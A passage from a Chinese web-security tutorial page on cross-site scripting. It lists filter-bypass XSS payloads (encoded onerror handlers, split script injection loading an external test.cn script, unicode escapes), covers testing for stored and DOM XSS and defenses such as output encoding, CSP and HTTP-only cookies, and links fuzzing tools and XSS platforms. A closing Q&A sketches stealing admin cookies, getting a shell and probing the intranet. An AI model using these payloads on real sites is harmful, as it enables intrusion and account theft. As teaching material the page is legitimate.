<span class="token operator">&lt;</span>img<span class="token punctuation">[</span><span class="token operator">%</span><span class="token number">0</span>d<span class="token punctuation">]</span>onerror<span class="token operator">=</span><span class="token function">alert</span><span class="token punctuation">(</span><span class="token number">1</span><span class="token punctuation">)</span> src<span class="token operator">=</span>a<span class="token operator">&gt;</span>
<span class="token operator">&lt;</span>img<span class="token punctuation">[</span><span class="token operator">%</span><span class="token number">0</span>a<span class="token punctuation">]</span>onerror<span class="token operator">=</span><span class="token function">alert</span><span class="token punctuation">(</span><span class="token number">1</span><span class="token punctuation">)</span> src<span class="token operator">=</span>a<span class="token operator">&gt;</span>
<span class="token operator">&lt;</span>img<span class="token operator">/</span>&quot;onerror<span class="token operator">=</span><span class="token function">alert</span><span class="token punctuation">(</span><span class="token number">1</span><span class="token punctuation">)</span> src<span class="token operator">=</span>a<span class="token operator">&gt;</span>
</code></pre> <div class="line-numbers-wrapper"><span class="line-number">1</span><br><span class="line-number">2</span><br><span class="line-number">3</span><br><span class="line-number">4</span><br></div></div><p><strong>属性名称</strong></p> <p>绕开一些检查以<code>on</code>开头的过滤器</p> <div class="language-javascript line-numbers-mode"><pre class="language-javascript"><code><span class="token operator">&lt;</span>img o<span class="token punctuation">[</span><span class="token operator">%</span><span class="token number">00</span><span class="token punctuation">]</span>nerror<span class="token operator">=</span><span class="token function">alert</span><span class="token punctuation">(</span><span class="token number">1</span><span class="token punctuation">)</span> src<span class="token operator">=</span>a<span class="token operator">&gt;</span>
</code></pre> <div class="line-numbers-wrapper"><span class="line-number">1</span><br></div></div><p>属性分隔符,把多个属性分隔开</p> <div class="language-javascript line-numbers-mode"><pre class="language-javascript"><code><span class="token operator">&lt;</span>img onerror<span class="token operator">=</span><span class="token string">'alert(1)'</span>src<span class="token operator">=</span>a<span class="token operator">&gt;</span>
</code></pre> <div class="line-numbers-wrapper"><span class="line-number">1</span><br></div></div><p><strong>属性值</strong></p> <p>可以用NULL字节或HTML编码属性值</p> <div class="language-javascript line-numbers-mode"><pre class="language-javascript"><code><span class="token operator">&lt;</span>img onerror<span class="token operator">=</span>a<span class="token punctuation">[</span><span class="token operator">%</span><span class="token number">00</span><span class="token punctuation">]</span><span class="token function">lert</span><span class="token punctuation">(</span><span class="token number">1</span><span class="token punctuation">)</span> src<span class="token operator">=</span>a<span class="token operator">&gt;</span>
<span class="token operator">&lt;</span>img onerror<span class="token operator">=</span>a<span class="token operator">&amp;</span>#x006c<span class="token punctuation">;</span><span class="token function">ert</span><span class="token punctuation">(</span><span class="token number">1</span><span class="token punctuation">)</span> src<span class="token operator">=</span>a<span class="token operator">&gt;</span>
</code></pre> <div class="line-numbers-wrapper"><span class="line-number">1</span><br><span class="line-number">2</span><br></div></div><blockquote><p>HTML编码 十六进制编码 base64编码 ASCII编码</p></blockquote> <p>以下属性可以被编码：</p> <div class="language-javascript line-numbers-mode"><pre class="language-javascript"><code>href<span class="token operator">=</span>
action<span class="token operator">=</span>
formaction<span class="token operator">=</span>
location<span class="token operator">=</span>
on<span class="token operator">*=</span>
name<span class="token operator">=</span>
background<span class="token operator">=</span>
poster<span class="token operator">=</span>
src<span class="token operator">=</span>
code<span class="token operator">=</span>
data<span class="token operator">=</span> <span class="token comment">//只支持base64</span>
</code></pre> <div class="line-numbers-wrapper"><span class="line-number">1</span><br><span class="line-number">2</span><br><span class="line-number">3</span><br><span class="line-number">4</span><br><span class="line-number">5</span><br><span class="line-number">6</span><br><span class="line-number">7</span><br><span class="line-number">8</span><br><span class="line-number">9</span><br><span class="line-number">10</span><br><span class="line-number">11</span><br></div></div><p><strong>字符集</strong></p> <p>有时可用一些非标准编码绕开过滤器</p> <p>UTF-7、US-ASCII、UTF-16</p> <p><strong>拆分跨站：</strong></p> <p>当应用程序没有过滤&lt;、&gt;关键字却限制了字符长度时可用拆分跨站</p> <div class="language-javascript line-numbers-mode"><pre class="language-javascript"><code><span class="token operator">&lt;</span>script<span class="token operator">&gt;</span>z<span class="token operator">=</span><span class="token string">'&lt;script src='</span><span class="token punctuation">;</span><span class="token comment">/*

*/</span>z<span class="token operator">+=</span><span class="token string">'test.c'</span><span class="token punctuation">;</span><span class="token comment">/*

*/</span>z<span class="token operator">+=</span><span class="token string">'n/1.js&gt;&lt;0/script&gt;'</span><span class="token punctuation">;</span><span class="token comment">/*

*/</span>document<span class="token punctuation">.</span><span class="token function">write</span><span class="token punctuation">(</span>z<span class="token punctuation">)</span><span class="token operator">&lt;</span><span class="token operator">/</span>script<span class="token operator">&gt;</span>
</code></pre> <div class="line-numbers-wrapper"><span class="line-number">1</span><br><span class="line-number">2</span><br><span class="line-number">3</span><br><span class="line-number">4</span><br><span class="line-number">5</span><br><span class="line-number">6</span><br><span class="line-number">7</span><br></div></div><p>最终执行</p> <div class="language- line-numbers-mode"><pre class="language-text"><code>&lt;script&gt;

z='undefined&lt;script src=test.cn/1.js&gt;&lt;/script&gt;';

document.write(z)

&lt;/script&gt;
</code></pre> <div class="line-numbers-wrapper"><span class="line-number">1</span><br><span class="line-number">2</span><br><span class="line-number">3</span><br><span class="line-number">4</span><br><span class="line-number">5</span><br><span class="line-number">6</span><br><span class="line-number">7</span><br></div></div><h4 id="避开过滤-脚本代码">避开过滤：脚本代码 <a href="#避开过滤-脚本代码" class="header-anchor">#</a></h4> <p>有些过滤器可能阻止javascript关键字和表达式，有用的字符，比如引号、括号和圆点。</p> <p><strong>Unicode转义</strong></p> <div class="language-javascript line-numbers-mode"><pre class="language-javascript"><code><span class="token operator">&lt;</span>script<span class="token operator">&gt;</span>a\<span class="token function">u006cert</span><span class="token punctuation">(</span><span class="token number">1</span><span class="token punctuation">)</span><span class="token operator">&lt;</span><span class="token operator">/</span>script<span class="token operator">&gt;</span>
</code></pre> <div class="line-numbers-wrapper"><span class="line-number">1</span><br></div></div><p>如果能够使用eval命令，就能够将其它命令以字符串的格式传送给eval，从而执行其它 命令。</p> <div class="language-javascript line-numbers-mode"><pre class="language-javascript"><code><span class="token operator">&lt;</span>script<span class="token operator">&gt;</span><span class="token function">eval</span><span class="token punctuation">(</span><span class="token string">'a\u006cert(1)'</span><span class="token punctuation">)</span><span class="token punctuation">;</span><span class="token operator">&lt;</span><span class="token operator">/</span>script<span class="token operator">&gt;</span>
</code></pre> <div class="line-numbers-wrapper"><span class="line-number">1</span><br></div></div><p><strong>替代圆点</strong></p> <div class="language-javascript line-numbers-mode"><pre class="language-javascript"><code><span class="token operator">&lt;</span>script<span class="token operator">&gt;</span><span class="token function">alert</span><span class="token punctuation">(</span>document<span class="token punctuation">[</span><span class="token string">'cookie'</span><span class="token punctuation">]</span><span class="token punctuation">)</span><span class="token operator">&lt;</span><span class="token operator">/</span>script<span class="token operator">&gt;</span>
<span class="token operator">&lt;</span>script<span class="token operator">&gt;</span><span class="token keyword">with</span><span class="token punctuation">(</span>document<span class="token punctuation">)</span><span class="token function">alert</span><span class="token punctuation">(</span>cookie<span class="token punctuation">)</span><span class="token operator">&lt;</span><span class="token operator">/</span>script<span class="token operator">&gt;</span>
</code></pre> <div class="line-numbers-wrapper"><span class="line-number">1</span><br><span class="line-number">2</span><br></div></div><h2 id="查找利用存储型xss">查找利用存储型XSS <a href="#查找利用存储型xss" class="header-anchor">#</a></h2> <p>确定保存型XSS漏洞的过程与前面描述的确定反射型XSS漏洞的过程类似。</p> <p>但是，这两个过程之间也存在一些重要的区别；</p> <p>在进行测试时必须记住这些区别，以确定尽可能多的漏洞。</p> <blockquote><p>(1) 向应用程序的每一个可能的位置提交一个特殊字符串后，必须反复检查应用程序的全部内容与功能；</p> <p>(2) 如有可能，应检查管理员能够访问的区域，确定其中是否有可以被非管理用户控制的数据；</p> <p>​      比如有些应用可以在浏览器查看日志，攻击者可留下恶意的HTML日志加以利用；</p> <p>(3) 检查应用的整个流程，确保测试彻底，检查任何可控的带外通道，如HTTP消息头；</p></blockquote> <p><strong>在上传文件中测试XSS</strong></p> <p>如果应用程序允许用户上传可被其它用户查看下载的文件，就会出现保存型XSS，这种漏洞常被人们忽略。</p> <p>测试时，首先上传一个验证性的HTML文件。</p> <p>如果该文件被接受，则尝试以正常方式下载该文件。</p> <p>如果应用程序按照原样返回最初的文件，并且脚本被执行，则应用肯定易于受到攻击。</p> <p>**例：**可把XSS的payload做成图片木马，上传到用户头像(用各种方法去绕过上传限制)</p> <h2 id="查找并利用dom型的xss漏洞">查找并利用DOM型的XSS漏洞 <a href="#查找并利用dom型的xss漏洞" class="header-anchor">#</a></h2> <p>确定基于DOM型的XSS漏洞，一种有效的方法是，检查所有客户端JavaScript，</p> <p>看其中是否使用任何可能会导致漏洞的DOM属性。</p> <p>工具<a href="https://www.blueinfy.com/#DOMTracer" target="_blank" rel="noopener noreferrer">DOMTracer<span><svg xmlns="http://www.w3.org/2000/svg" aria-hidden="true" focusable="false" x="0px" y="0px" viewBox="0 0 100 100" width="15" height="15" class="icon outbound"><path fill="currentColor" d="M18.8,85.1h56l0,0c2.2,0,4-1.8,4-4v-32h-8v28h-48v-48h28v-8h-32l0,0c-2.2,0-4,1.8-4,4v56C14.8,83.3,16.6,85.1,18.8,85.1z"></path> <polygon fill="currentColor" points="45.7,48.7 51.3,54.3 77.2,28.5 77.2,37.2 85.2,37.2 85.2,14.9 62.8,14.9 62.8,22.9 71.5,22.9"></polygon></svg> <span class="sr-only">(opens new window)</span></span></a>可自动完成这个测试过程。</p> <p>检查每一段客户端JavaScript，看其中是否出现以下API</p> <p>它们可用于访问通过一个专门设计的URL控制的DOM数据；</p> <div class="language-javascript line-numbers-mode"><pre class="language-javascript"><code> document<span class="token punctuation">.</span>location
 document<span class="token punctuation">.</span><span class="token constant">URL</span>
 document<span class="token punctuation">.</span>URLUnencoded
 document<span class="token punctuation">.</span>referrer
 window<span class="token punctuation">.</span>location
</code></pre> <div class="line-numbers-wrapper"><span class="line-number">1</span><br><span class="line-number">2</span><br><span class="line-number">3</span><br><span class="line-number">4</span><br><span class="line-number">5</span><br></div></div><p>在每一个使用上述API的位置，仔细检查那里的代码，确定应用程序如何处理用户可控的数据；</p> <p>以及是否可以使用专门设计的输入来执行JavaScript。</p> <p>尤其注意检查并测试控制的数据被传送至以下任何一个API的情况</p> <div class="language-javascript line-numbers-mode"><pre class="language-javascript"><code>document<span class="token punctuation">.</span><span class="token function">write</span><span class="token punctuation">(</span><span class="token punctuation">)</span>
document<span class="token punctuation">.</span><span class="token function">writeln</span><span class="token punctuation">(</span><span class="token punctuation">)</span>
document<span class="token punctuation">.</span>body<span class="token punctuation">.</span>innerHtml
<span class="token function">eval</span><span class="token punctuation">(</span><span class="token punctuation">)</span>
window<span class="token punctuation">.</span><span class="token function">execScript</span><span class="token punctuation">(</span><span class="token punctuation">)</span>
window<span class="token punctuation">.</span><span class="token function">setInterval</span><span class="token punctuation">(</span><span class="token punctuation">)</span>
window<span class="token punctuation">.</span><span class="token function">setTimeout</span><span class="token punctuation">(</span><span class="token punctuation">)</span>
</code></pre> <div class="line-numbers-wrapper"><span class="line-number">1</span><br><span class="line-number">2</span><br><span class="line-number">3</span><br><span class="line-number">4</span><br><span class="line-number">5</span><br><span class="line-number">6</span><br><span class="line-number">7</span><br></div></div><p>片段技巧：服务器不解析url中#后的内容</p> <h2 id="防止反射型与存储型xss">防止反射型与存储型XSS <a href="#防止反射型与存储型xss" class="header-anchor">#</a></h2> <p>用户可控的数据未经适当的确认与净化就被复制到应用程序响应中，这是造成反射型与保存型XSS漏洞的根本原因</p> <p><strong>1.确认输入</strong></p> <blockquote><p>数据不能太长</p> <p>数据仅包含某组合法字符</p> <p>数据与一个特殊的正则表达式相匹配</p></blockquote> <p>根据应用程序希望在字段中收到的数据类型，应尽可能的限制性的对姓名、电子邮件地址、账号等</p> <p>应用不同的确认规则。</p> <p><strong>2.确认输出</strong></p> <p>如果应用程序将某位用户或第三方提交的数据复制到它的响应中，应对这些数据进行HTML编码，净化恶意代码。</p> <p><strong>3.消除危险插入点</strong></p> <p>应尽量避免直接在现有的JavaScript中插入用户可控的数据；</p> <p>如果标签属性接受URL作为它的值，应避免嵌入用户的输入；</p> <p><strong>4.允许有限的HTML</strong></p> <p>一些应用程序允许用户以HTML格式提交即将插入到应用程序响应中的数据。</p> <p>例如博客、论坛的富文本编辑器允许使用HTML书写。</p> <p>有各种框架(如OWASP AntiSamy项目)可用于确认用户提交的HTML标记，以确保其中未包含任何执行JavaScript的方法。</p> <h2 id="防止基于dom的xss漏洞">防止基于DOM的XSS漏洞 <a href="#防止基于dom的xss漏洞" class="header-anchor">#</a></h2> <p>造成这种漏洞并无法不需要将用户可控的数据复制到服务器响应中，所以上述防范方法对DOM型XSS无用；</p> <p>应用程序应尽量避免使用客户端脚本处理DOM数据并把它插入到页面中；</p> <p>如果无法避免，应使用以下两种方法防御DOM型XSS攻击。</p> <p><strong>1.确认输入</strong></p> <p>客户端，确认将要插入到文档中的数据仅包含字母数字与空白符</p> <div class="language-javascript line-numbers-mode"><pre class="language-javascript"><code><span class="token operator">&lt;</span>script<span class="token operator">&gt;</span>
    <span class="token keyword">var</span> a <span class="token operator">=</span> document<span class="token punctuation">.</span><span class="token constant">URL</span><span class="token punctuation">;</span>
    a <span class="token operator">=</span> a<span class="token punctuation">.</span><span class="token function">substring</span><span class="token punctuation">(</span>a<span class="token punctuation">.</span><span class="token function">indexOf</span><span class="token punctuation">(</span><span class="token string">&quot;message=&quot;</span><span class="token punctuation">)</span> <span class="token operator">+</span> <span class="token number">8</span><span class="token punctuation">,</span> a<span class="token punctuation">.</span>length<span class="token punctuation">)</span><span class="token punctuation">;</span>
    a <span class="token operator">=</span> <span class="token function">unescape</span><span class="token punctuation">(</span>a<span class="token punctuation">)</span><span class="token punctuation">;</span>
    <span class="token keyword">var</span> regex<span class="token operator">=</span><span class="token regex"><span class="token regex-delimiter">/</span><span class="token regex-source language-regex">^(A-Za-z0-9+\s)*$</span><span class="token regex-delimiter">/</span></span><span class="token punctuation">;</span>
    <span class="token keyword">if</span> <span class="token punctuation">(</span>regex<span class="token punctuation">.</span><span class="token function">test</span><span class="token punctuation">(</span>a<span class="token punctuation">)</span><span class="token punctuation">)</span>
        document<span class="token punctuation">.</span><span class="token function">write</span><span class="token punctuation">(</span>a<span class="token punctuation">)</span><span class="token punctuation">;</span>
<span class="token operator">&lt;</span><span class="token operator">/</span>script<span class="token operator">&gt;</span>
</code></pre> <div class="line-numbers-wrapper"><span class="line-number">1</span><br><span class="line-number">2</span><br><span class="line-number">3</span><br><span class="line-number">4</span><br><span class="line-number">5</span><br><span class="line-number">6</span><br><span class="line-number">7</span><br><span class="line-number">8</span><br></div></div><p>服务端，对URL数据进行严格确认</p> <blockquote><p>查询字符串中只有一个参数</p> <p>参数名大小写检查</p> <p>参数值仅包含数字字母</p></blockquote> <p><strong>2.确认输出</strong></p> <p>在将用户可控的DOM数据插入到文档之前，进行HTML编码</p> <div class="language-javascript line-numbers-mode"><pre class="language-javascript"><code><span class="token operator">&lt;</span><span class="token operator">?</span>php
    <span class="token keyword">function</span> <span class="token function">reinit</span><span class="token punctuation">(</span><span class="token parameter">str</span><span class="token punctuation">)</span>
    <span class="token punctuation">{</span>
        <span class="token keyword">var</span> d <span class="token operator">=</span> document<span class="token punctuation">.</span><span class="token function">createElement</span><span class="token punctuation">(</span><span class="token string">'div'</span><span class="token punctuation">)</span><span class="token punctuation">;</span>
        d<span class="token punctuation">.</span><span class="token function">appendChild</span><span class="token punctuation">(</span>document<span class="token punctuation">.</span><span class="token function">createTextNode</span><span class="token punctuation">(</span>str<span class="token punctuation">)</span><span class="token punctuation">)</span><span class="token punctuation">;</span>
        <span class="token keyword">return</span> d<span class="token punctuation">.</span>innerHTML<span class="token punctuation">;</span>
    <span class="token punctuation">}</span>
<span class="token operator">?</span><span class="token operator">&gt;</span>
</code></pre> <div class="line-numbers-wrapper"><span class="line-number">1</span><br><span class="line-number">2</span><br><span class="line-number">3</span><br><span class="line-number">4</span><br><span class="line-number">5</span><br><span class="line-number">6</span><br><span class="line-number">7</span><br><span class="line-number">8</span><br></div></div><h2 id="其他-xss-防范措施">其他 XSS 防范措施 <a href="#其他-xss-防范措施" class="header-anchor">#</a></h2> <p>介绍一些通用的方案，可以降低 XSS 带来的风险和后果。</p> <p><strong>Content Security Policy</strong></p> <p>严格的 CSP 在 XSS 的防范中可以起到以下的作用：</p> <blockquote><p>禁止加载外域代码，防止复杂的攻击逻辑。</p> <p>禁止外域提交，网站被攻击后，用户的数据不会泄露到外域。</p> <p>禁止内联脚本执行（规则较严格，目前发现 GitHub 使用）。</p> <p>禁止未授权的脚本执行（新特性，Google Map 移动版在使用）。</p> <p>合理使用上报可以及时发现 XSS，利于尽快修复问题。</p></blockquote> <p><strong>输入内容长度控制</strong></p> <p>对于不受信任的输入，都应该限定一个合理的长度。</p> <p>虽然无法完全防止 XSS 发生，但可以增加 XSS 攻击的难度。</p> <p><strong>HTTP-only</strong></p> <p>HTTP-only Cookie: 禁止 JavaScript 读取某些敏感 Cookie，攻击者完成 XSS 注入后也无法窃取此 Cookie。</p> <p>验证码：防止脚本冒充用户提交危险操作。</p> <h2 id="xss工具">xss工具 <a href="#xss工具" class="header-anchor">#</a></h2> <p>XSS前端编码：https://github.com/evilcos/xssor2</p> <p>Xss-cheat-sheet： https://portswigger.net/web-security/cross-site-scripting/cheat-sheet</p> <p><strong>XSS_Fuzz</strong></p> <table><thead><tr><th style="text-align:left;">官网</th> <th style="text-align:left;">软件对应科普文</th></tr></thead> <tbody><tr><td style="text-align:left;"><a href="https://github.com/ym2011/PEST/tree/master/BruteXSS" target="_blank" rel="noopener noreferrer">BruteXSS<span><svg xmlns="http://www.w3.org/2000/svg" aria-hidden="true" focusable="false" x="0px" y="0px" viewBox="0 0 100 100" width="15" height="15" class="icon outbound"><path fill="currentColor" d="M18.8,85.1h56l0,0c2.2,0,4-1.8,4-4v-32h-8v28h-48v-48h28v-8h-32l0,0c-2.2,0-4,1.8-4,4v56C14.8,83.3,16.6,85.1,18.8,85.1z"></path> <polygon fill="currentColor" points="45.7,48.7 51.3,54.3 77.2,28.5 77.2,37.2 85.2,37.2 85.2,14.9 62.8,14.9 62.8,22.9 71.5,22.9"></polygon></svg> <span class="sr-only">(opens new window)</span></span></a></td> <td style="text-align:left;"><a href="https://www.freebuf.com/sectool/109239.html" target="_blank" rel="noopener noreferrer">Freebuf相关科普<span><svg xmlns="http://www.w3.org/2000/svg" aria-hidden="true" focusable="false" x="0px" y="0px" viewBox="0 0 100 100" width="15" height="15" class="icon outbound"><path fill="currentColor" d="M18.8,85.1h56l0,0c2.2,0,4-1.8,4-4v-32h-8v28h-48v-48h28v-8h-32l0,0c-2.2,0-4,1.8-4,4v56C14.8,83.3,16.6,85.1,18.8,85.1z"></path> <polygon fill="currentColor" points="45.7,48.7 51.3,54.3 77.2,28.5 77.2,37.2 85.2,37.2 85.2,14.9 62.8,14.9 62.8,22.9 71.5,22.9"></polygon></svg> <span class="sr-only">(opens new window)</span></span></a> <a href="https://www.cnblogs.com/Pitcoft/p/6341322.html" target="_blank" rel="noopener noreferrer">汉化版<span><svg xmlns="http://www.w3.org/2000/svg" aria-hidden="true" focusable="false" x="0px" y="0px" viewBox="0 0 100 100" width="15" height="15" class="icon outbound"><path fill="currentColor" d="M18.8,85.1h56l0,0c2.2,0,4-1.8,4-4v-32h-8v28h-48v-48h28v-8h-32l0,0c-2.2,0-4,1.8-4,4v56C14.8,83.3,16.6,85.1,18.8,85.1z"></path> <polygon fill="currentColor" points="45.7,48.7 51.3,54.3 77.2,28.5 77.2,37.2 85.2,37.2 85.2,14.9 62.8,14.9 62.8,22.9 71.5,22.9"></polygon></svg> <span class="sr-only">(opens new window)</span></span></a></td></tr> <tr><td style="text-align:left;"><a href="https://github.com/bsmali4/xssfork" target="_blank" rel="noopener noreferrer">XSSfrok<span><svg xmlns="http://www.w3.org/2000/svg" aria-hidden="true" focusable="false" x="0px" y="0px" viewBox="0 0 100 100" width="15" height="15" class="icon outbound"><path fill="currentColor" d="M18.8,85.1h56l0,0c2.2,0,4-1.8,4-4v-32h-8v28h-48v-48h28v-8h-32l0,0c-2.2,0-4,1.8-4,4v56C14.8,83.3,16.6,85.1,18.8,85.1z"></path> <polygon fill="currentColor" points="45.7,48.7 51.3,54.3 77.2,28.5 77.2,37.2 85.2,37.2 85.2,14.9 62.8,14.9 62.8,22.9 71.5,22.9"></polygon></svg> <span class="sr-only">(opens new window)</span></span></a></td> <td style="text-align:left;"><a href="https://paper.seebug.org/359/#xssfork" target="_blank" rel="noopener noreferrer">Seebug作者教程<span><svg xmlns="http://www.w3.org/2000/svg" aria-hidden="true" focusable="false" x="0px" y="0px" viewBox="0 0 100 100" width="15" height="15" class="icon outbound"><path fill="currentColor" d="M18.8,85.1h56l0,0c2.2,0,4-1.8,4-4v-32h-8v28h-48v-48h28v-8h-32l0,0c-2.2,0-4,1.8-4,4v56C14.8,83.3,16.6,85.1,18.8,85.1z"></path> <polygon fill="currentColor" points="45.7,48.7 51.3,54.3 77.2,28.5 77.2,37.2 85.2,37.2 85.2,14.9 62.8,14.9 62.8,22.9 71.5,22.9"></polygon></svg> <span class="sr-only">(opens new window)</span></span></a></td></tr></tbody></table> <p><a href="http://xss.fbisb.com/xss.php" target="_blank" rel="noopener noreferrer">.<span><svg xmlns="http://www.w3.org/2000/svg" aria-hidden="true" focusable="false" x="0px" y="0px" viewBox="0 0 100 100" width="15" height="15" class="icon outbound"><path fill="currentColor" d="M18.8,85.1h56l0,0c2.2,0,4-1.8,4-4v-32h-8v28h-48v-48h28v-8h-32l0,0c-2.2,0-4,1.8-4,4v56C14.8,83.3,16.6,85.1,18.8,85.1z"></path> <polygon fill="currentColor" points="45.7,48.7 51.3,54.3 77.2,28.5 77.2,37.2 85.2,37.2 85.2,14.9 62.8,14.9 62.8,22.9 71.5,22.9"></polygon></svg> <span class="sr-only">(opens new window)</span></span></a></p> <p><a href="https://xs.sb/xss.php" target="_blank" rel="noopener noreferrer">..<span><svg xmlns="http://www.w3.org/2000/svg" aria-hidden="true" focusable="false" x="0px" y="0px" viewBox="0 0 100 100" width="15" height="15" class="icon outbound"><path fill="currentColor" d="M18.8,85.1h56l0,0c2.2,0,4-1.8,4-4v-32h-8v28h-48v-48h28v-8h-32l0,0c-2.2,0-4,1.8-4,4v56C14.8,83.3,16.6,85.1,18.8,85.1z"></path> <polygon fill="currentColor" points="45.7,48.7 51.3,54.3 77.2,28.5 77.2,37.2 85.2,37.2 85.2,14.9 62.8,14.9 62.8,22.9 71.5,22.9"></polygon></svg> <span class="sr-only">(opens new window)</span></span></a></p> <h2 id="问题">问题 <a href="#问题" class="header-anchor">#</a></h2> <p><strong>如何快速发现 xss 位置 ？</strong></p> <p>对于反射型<code>XSS</code>：</p> <p>一般来说就是找输入点的可控参数，比如搜索框、留言板、 登录 / 注册，构造payload发送，监控响应</p> <p>上边这种方法不适用于DOM型<code>XSS</code>，因为 基于DOM的<code>XSS</code>漏洞 ， payload并不在服务器的响应中返回，而是保存在浏览器的DOM中</p> <p>对于存储型<code>XSS</code>：正常的输入payload查看是否过滤，也可以反向猜测输出点，构造payload去输入</p> <p><strong>XSS 蠕虫的产生条件 ？</strong></p> <ol><li><p>可以执行恶意操作；</p></li> <li><p>可以感染并传播</p> <blockquote><p>就是产生<code>XSS</code>点的页面不属于self页面，用户之间产生交互行为的页面，都可能造成XSS Worm的产生 （微博、贴吧）</p> <p>由于<code>XSS</code>蠕虫基于浏览器而不是操作系统，取决于其依赖网站的规模，它可以在短时间内达到对巨大数量的计算机感染</p></blockquote></li></ol> <p><strong><code>XSS</code>能打到后台，但是后台系统处于内网，怎么做内网探测？</strong></p> <p><code>XSS</code>平台拿cookie登录后台，或钓鱼拿登录，然后找上传点<code>getshell</code>，然后结合msf使用</p> <p>实例参考：https://bbs.ichunqiu.com/thread-46068-1-1.html?from=bkyl</p> <blockquote><p>github有一些现成的xss扫描内网端口的脚本，可以参考利用</p> <p>再根据探测出来的信息进一步利用，比如开了redis等，再就是利用漏洞去getshell</p></blockquote></div> <footer class="page-edit"><!----> <div class="last-updated"><span class="prefix">上次更新:</span> <span class="time">12/18/2021, 12:46:42 PM</span></div></footer> <div class="page-nav"><p class="inner"><span class="prev"><a href="/knowledge/web/same-origin-policy.html" class="prev"><i aria-label="icon: left" class="anticon anticon-left"><svg viewBox="64 64 896 896" focusable="false" data-icon="left" width="1em" height="1em" fill="currentColor" aria-hidden="true"><path d="M724 218.3V141c0-6.7-7.7-10.4-12.9-6.3L260.3 486.8a31.86 31.86 0 0 0 0 50.3l450.8 352.1c5.3 4.1 12.9.4 12.9-6.3v-77.3c0-4.9-2.3-9.6-6.1-12.6l-360-281 360-281.1c3.8-3 6.1-7.7 6.1-12.6z"></path></svg></i>
        同源策略和域安全
      </a></span> <span class="next"><a href="/knowledge/web/xxe.html">
        XML实体注入漏洞
        <i aria-label="icon: right" class="anticon anticon-right"><svg viewBox="64 64 896 896" focusable="false" data-icon="right" width="1em" height="1em" fill="currentColor" aria-hidden="true"><path d="M765.7 486.8L314.9 134.7A7.97 7.97 0 0 0 302 141v77.3c0 4.9 2.3 9.6 6.1 12.6l360 281.1-360 281.1c-3.9 3-6.1 7.7-6.1 12.6V883c0 6.7 7.7 10.4 12.9 6.3l450.8-352.1a31.96 31.96 0 0 0 0-50.4z"></path></svg></i></a></span></p></div> </main> <!----></div><div class="global-ui"></div></div>
    <script src="/assets/js/app.f7464420.js" defer></script><script src="/assets/js/2.26207483.js" defer></script><script src="/assets/js/83.a2ff144a.js" defer></script>
  </body>
</html>